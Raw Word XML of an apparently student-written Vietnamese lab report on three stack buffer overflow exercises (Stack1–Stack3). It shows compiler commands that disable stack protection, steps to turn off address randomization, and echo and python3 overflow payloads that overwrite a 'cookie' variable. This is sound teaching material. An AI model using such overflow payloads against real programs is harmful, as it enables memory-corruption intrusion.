    <w:p w14:paraId="661848CF" w14:textId="77777777" w:rsidR="00EF2828" w:rsidRDefault="00EF2828">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="52E7D3CA" w14:textId="77777777" w:rsidR="00EF2828" w:rsidRDefault="00EF2828">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="041F3323" w14:textId="77777777" w:rsidR="00EF2828" w:rsidRDefault="00EF2828">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5823D60C" w14:textId="77777777" w:rsidR="00EF2828" w:rsidRDefault="00EF2828">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6AFCEBE1" w14:textId="77777777" w:rsidR="00EF2828" w:rsidRDefault="00EF2828">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="288DDE7F" w14:textId="77777777" w:rsidR="00EF2828" w:rsidRDefault="00EF2828">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E87EE4D" w14:textId="77777777" w:rsidR="00EF2828" w:rsidRDefault="00EF2828">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0CD7E3FB" w14:textId="77777777" w:rsidR="00EF2828" w:rsidRDefault="00EF2828">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="592B91DA" w14:textId="7C80F146" w:rsidR="00EF2828" w:rsidRDefault="00285EEF" w:rsidP="00EF2828">
      <w:pPr>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc164791213"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Bài </w:t>
      </w:r>
      <w:r w:rsidR="00EF2828">
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>1: Stack1.c</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="63234E92" w14:textId="76489290" w:rsidR="00727950" w:rsidRDefault="00727950">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>- Stack1.c</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12A80741" w14:textId="532AFC8A" w:rsidR="00EF2828" w:rsidRDefault="00A94971">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A94971">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0745C7A1" wp14:editId="2AD45C32">
            <wp:extent cx="5943600" cy="2367280"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="6829859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8592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4EBD" w14:textId="33270F41" w:rsidR="00EF2828" w:rsidRDefault="00727950">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>- Tắt random địa chỉ</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6927D17D" w14:textId="380153A2" w:rsidR="00A94971" w:rsidRDefault="00A94971">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A94971">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="25F23FE6" wp14:editId="4B418ED3">
            <wp:extent cx="5943600" cy="668655"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="39254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41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515" w14:textId="10AB9CCF" w:rsidR="00727950" w:rsidRPr="00727950" w:rsidRDefault="00727950" w:rsidP="00727950">
      <w:r>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>- Biên dịch chương trình:</w:t>
      </w:r>
      <w:r w:rsidRPr="00727950">
        <w:t xml:space="preserve"> gcc -fno-stack-protector -ggdb -mpreferred-stack-boundary=4 ./stack1.c -o stack1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B9DAE3E" w14:textId="5C197D8D" w:rsidR="00727950" w:rsidRDefault="00727950">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2DB2D7C5" w14:textId="497CD263" w:rsidR="00A94971" w:rsidRDefault="00A94971">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A94971">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="54A007E4" wp14:editId="634F4B3F">
            <wp:extent cx="5943600" cy="3298190"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1230095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9531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CA46" w14:textId="6EB12649" w:rsidR="00A94971" w:rsidRDefault="00FD3001">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>- Nhập chuỗi đúng để ra được “You Win!”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50FCE96E" w14:textId="7D74BA1D" w:rsidR="00BA2CC9" w:rsidRDefault="00BA2CC9" w:rsidP="00BA2CC9">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA2CC9">
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>cookie bị thay đổi chính là do biến buf bị tràn và lấn qua phần</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00BA2CC9">
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>bộ nhớ của cookie.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30EE3525" w14:textId="77777777" w:rsidR="00EF2828" w:rsidRDefault="00EF2828" w:rsidP="00BA2CC9">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="430D9639" w14:textId="026D6F3A" w:rsidR="00EF2828" w:rsidRDefault="00A94971" w:rsidP="00EF2828">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A94971">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0C3C3578" wp14:editId="134B1F20">
            <wp:extent cx="5943600" cy="3720465"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="19854170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1708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64791214"/>
    </w:p>
    <w:p w14:paraId="1FA1A9F0" w14:textId="77777777" w:rsidR="00EF2828" w:rsidRDefault="00EF2828" w:rsidP="00EF2828">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7CB153B1" w14:textId="77777777" w:rsidR="00EF2828" w:rsidRDefault="00EF2828" w:rsidP="00EF2828">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="63B3FCAA" w14:textId="77777777" w:rsidR="00EF2828" w:rsidRDefault="00EF2828" w:rsidP="00EF2828">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A258F8F" w14:textId="77777777" w:rsidR="00EF2828" w:rsidRDefault="00EF2828" w:rsidP="00EF2828">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F86F113" w14:textId="77777777" w:rsidR="00EF2828" w:rsidRDefault="00EF2828" w:rsidP="00EF2828">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1223C4FA" w14:textId="77777777" w:rsidR="00EF2828" w:rsidRDefault="00EF2828" w:rsidP="00EF2828">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="523385D0" w14:textId="77777777" w:rsidR="00EF2828" w:rsidRDefault="00EF2828" w:rsidP="00EF2828">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="52628035" w14:textId="77777777" w:rsidR="00EF2828" w:rsidRDefault="00EF2828" w:rsidP="00EF2828">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="70A7BD1A" w14:textId="77777777" w:rsidR="00EF2828" w:rsidRDefault="00EF2828" w:rsidP="00EF2828">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E443655" w14:textId="77777777" w:rsidR="00EF2828" w:rsidRDefault="00EF2828" w:rsidP="00EF2828">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="48A5CE35" w14:textId="77777777" w:rsidR="00EF2828" w:rsidRDefault="00EF2828" w:rsidP="00EF2828">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E022072" w14:textId="3C3B1E7E" w:rsidR="00F33A11" w:rsidRDefault="00F33A11" w:rsidP="00EF2828">
      <w:pPr>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Bài </w:t>
      </w:r>
      <w:r w:rsidR="00EF2828">
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>2: Stack2.c</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p w14:paraId="0852A26A" w14:textId="25F44D90" w:rsidR="00FD3001" w:rsidRDefault="00FD3001">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>- Tắt random địa chỉ</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11BFD53F" w14:textId="79B50143" w:rsidR="00FD3001" w:rsidRDefault="00F33A11">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F33A11">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3C301A4B" wp14:editId="4E347D87">
            <wp:extent cx="5943600" cy="1437640"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="744325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259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3F01" w14:textId="5D8687C9" w:rsidR="00FD3001" w:rsidRDefault="00FD3001">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>- Stack2.c</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DDAFBF8" w14:textId="1E389A16" w:rsidR="003F2E8F" w:rsidRDefault="003F2E8F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003F2E8F">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7C7BF49D" wp14:editId="6021549C">
            <wp:extent cx="6010941" cy="3230880"/>
            <wp:effectExtent l="0" t="0" r="8890" b="7620"/>
            <wp:docPr id="10938228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2289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3234" cy="32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E43C" w14:textId="54237852" w:rsidR="003F2E8F" w:rsidRDefault="00FD3001">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve">- Biên dịch chương trình: </w:t>
      </w:r>
      <w:r w:rsidRPr="00FD3001">
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>gcc -fno-stack-protector . /stack2.c -o stack2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="407FEAE0" w14:textId="2A23EF7D" w:rsidR="003F2E8F" w:rsidRDefault="003F2E8F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003F2E8F">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3FA74CC0" wp14:editId="1A5D6A87">
            <wp:extent cx="5943600" cy="2072640"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="426298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9850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9814" w14:textId="2175F0AB" w:rsidR="00FD3001" w:rsidRPr="00FD3001" w:rsidRDefault="00FD3001" w:rsidP="00FD3001">
      <w:r>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidRPr="00FD3001">
        <w:t>C1 Sử dụng echo và pipe (|):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="263EF35C" w14:textId="77777777" w:rsidR="00FD3001" w:rsidRPr="00FD3001" w:rsidRDefault="00FD3001" w:rsidP="00FD3001">
      <w:r w:rsidRPr="00FD3001">
        <w:t xml:space="preserve">echo -e "aaaaaaaaaaaaaaaaaaaaaaaaaaaa\005\003\002\001" </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00FD3001">
        <w:t>| .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00FD3001">
        <w:t>/stack2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="580ADDD2" w14:textId="142AA838" w:rsidR="00FD3001" w:rsidRPr="00FD3001" w:rsidRDefault="00FD3001" w:rsidP="00FD3001">
      <w:r>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidRPr="00FD3001">
        <w:t>C2 Sử dụng python để nhập chuỗi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33ECB37B" w14:textId="77777777" w:rsidR="00FD3001" w:rsidRPr="00FD3001" w:rsidRDefault="00FD3001" w:rsidP="00FD3001">
      <w:r w:rsidRPr="00FD3001">
        <w:t>python3 -c '</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00FD3001">
        <w:t>print(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00FD3001">
        <w:t>"a"*28 + "\x05\x03\x02\x01")' | ./stack2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CDEA373" w14:textId="77777777" w:rsidR="003F2E8F" w:rsidRDefault="003F2E8F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6302F905" w14:textId="55220B10" w:rsidR="003F2E8F" w:rsidRDefault="003F2E8F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003F2E8F">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="160F355D" wp14:editId="5F735448">
            <wp:extent cx="5943600" cy="2360295"/>
            <wp:effectExtent l="0" t="0" r="0" b="1905"/>
            <wp:docPr id="2566533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5334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FF83" w14:textId="77777777" w:rsidR="003F2E8F" w:rsidRDefault="003F2E8F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="61ACA6B3" w14:textId="77777777" w:rsidR="003F2E8F" w:rsidRDefault="003F2E8F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E1F1F32" w14:textId="77777777" w:rsidR="00EF2828" w:rsidRDefault="00EF2828">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="366ED713" w14:textId="77777777" w:rsidR="00EF2828" w:rsidRDefault="00EF2828">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51E6E831" w14:textId="77777777" w:rsidR="00EF2828" w:rsidRDefault="00EF2828">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D2DDA3A" w14:textId="77777777" w:rsidR="00EF2828" w:rsidRDefault="00EF2828">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="781681FC" w14:textId="77777777" w:rsidR="00EF2828" w:rsidRDefault="00EF2828">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1458A5C0" w14:textId="77777777" w:rsidR="00EF2828" w:rsidRDefault="00EF2828">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="23AFF09E" w14:textId="77777777" w:rsidR="00EF2828" w:rsidRDefault="00EF2828">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2723253A" w14:textId="77777777" w:rsidR="00EF2828" w:rsidRDefault="00EF2828">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="41450010" w14:textId="77777777" w:rsidR="00EF2828" w:rsidRDefault="00EF2828">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F4C095C" w14:textId="77777777" w:rsidR="00EF2828" w:rsidRDefault="00EF2828">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="21CFC180" w14:textId="77777777" w:rsidR="00EF2828" w:rsidRDefault="00EF2828">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5EA61806" w14:textId="4DA19E05" w:rsidR="003F2E8F" w:rsidRDefault="003F2E8F" w:rsidP="00EF2828">
      <w:pPr>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_Toc164791215"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Bài </w:t>
      </w:r>
      <w:r w:rsidR="00EF2828">
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>3: Stack3.c</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p w14:paraId="43A2EA65" w14:textId="7B0BCD26" w:rsidR="003F2E8F" w:rsidRDefault="00FD3001">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>- Stack3.c</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10F854C2" w14:textId="61605E5E" w:rsidR="003F2E8F" w:rsidRDefault="003F2E8F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003F2E8F">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="491118C2" wp14:editId="127F2DE8">
            <wp:extent cx="5943600" cy="3666490"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1820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9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0D57" w14:textId="77777777" w:rsidR="00EF2828" w:rsidRDefault="00EF2828">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="72DC5F21" w14:textId="50CDCE3A" w:rsidR="00B973E7" w:rsidRDefault="00FD3001">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>- Biên dịch chương trình :</w:t>
      </w:r>
      <w:r w:rsidRPr="00FD3001">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas"/>
          <w:color w:val="6A9955"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00FD3001">
        <w:t>gcc -fno-stack-protector ./stack3.c -o stack3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58B7F846" w14:textId="7677B97C" w:rsidR="00B973E7" w:rsidRDefault="00B973E7">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B973E7">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6A13CB25" wp14:editId="6BB29594">
            <wp:extent cx="5943600" cy="2179320"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="85742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225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5D9" w14:textId="77777777" w:rsidR="00EF2828" w:rsidRDefault="00EF2828">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A896A62" w14:textId="77777777" w:rsidR="00EF2828" w:rsidRDefault="00EF2828">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="18F4073A" w14:textId="77777777" w:rsidR="00EF2828" w:rsidRDefault="00EF2828">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="52BE6141" w14:textId="22609213" w:rsidR="00BA2CC9" w:rsidRPr="00BA2CC9" w:rsidRDefault="00BA2CC9" w:rsidP="00BA2CC9">
      <w:r>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidRPr="00BA2CC9">
        <w:t>C1 Sử dụng echo và pipe (|):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CA5D43A" w14:textId="6DD0A057" w:rsidR="00BA2CC9" w:rsidRPr="00BA2CC9" w:rsidRDefault="00BA2CC9" w:rsidP="00BA2CC9">
      <w:r w:rsidRPr="00BA2CC9">
        <w:t xml:space="preserve">echo -e "aaaaaaaaaaaaaaaaaaaaaaaaaaaa\000\003\002\000" </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BA2CC9">
        <w:t>| .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BA2CC9">
        <w:t>/stack3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30CBA697" w14:textId="25577E69" w:rsidR="00BA2CC9" w:rsidRPr="00BA2CC9" w:rsidRDefault="00BA2CC9" w:rsidP="00BA2CC9">
      <w:r>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidRPr="00BA2CC9">
        <w:t>C2 Sử dụng python để nhập chuỗi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FC2A987" w14:textId="289948CE" w:rsidR="00BA2CC9" w:rsidRPr="00BA2CC9" w:rsidRDefault="00BA2CC9" w:rsidP="00BA2CC9">
      <w:r w:rsidRPr="00BA2CC9">
        <w:t>python3 -c '</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BA2CC9">
        <w:t>print(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BA2CC9">
        <w:t>"a"*28 + "\x00\x03\x02\x00")' | ./stack3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CB50D55" w14:textId="77777777" w:rsidR="00B973E7" w:rsidRDefault="00B973E7">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4513D310" w14:textId="240BAE46" w:rsidR="00B973E7" w:rsidRDefault="00B973E7">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B973E7">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6F298327" wp14:editId="4BAC3E1B">
            <wp:extent cx="5943600" cy="1976755"/>
            <wp:effectExtent l="0" t="0" r="0" b="4445"/>
            <wp:docPr id="7367305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30565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7C4" w14:textId="77777777" w:rsidR="00285EEF" w:rsidRDefault="00285EEF">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="03B2C7A2" w14:textId="77777777" w:rsidR="00285EEF" w:rsidRDefault="00285EEF">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="19C5910D" w14:textId="77777777" w:rsidR="00EF2828" w:rsidRDefault="00EF2828">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="62F7600B" w14:textId="77777777" w:rsidR="00EF2828" w:rsidRDefault="00EF2828">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34F514D4" w14:textId="77777777" w:rsidR="00EF2828" w:rsidRDefault="00EF2828">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="22EDF5BE" w14:textId="77777777" w:rsidR="00EF2828" w:rsidRDefault="00EF2828">
      <w:pPr>
        <w:rPr>
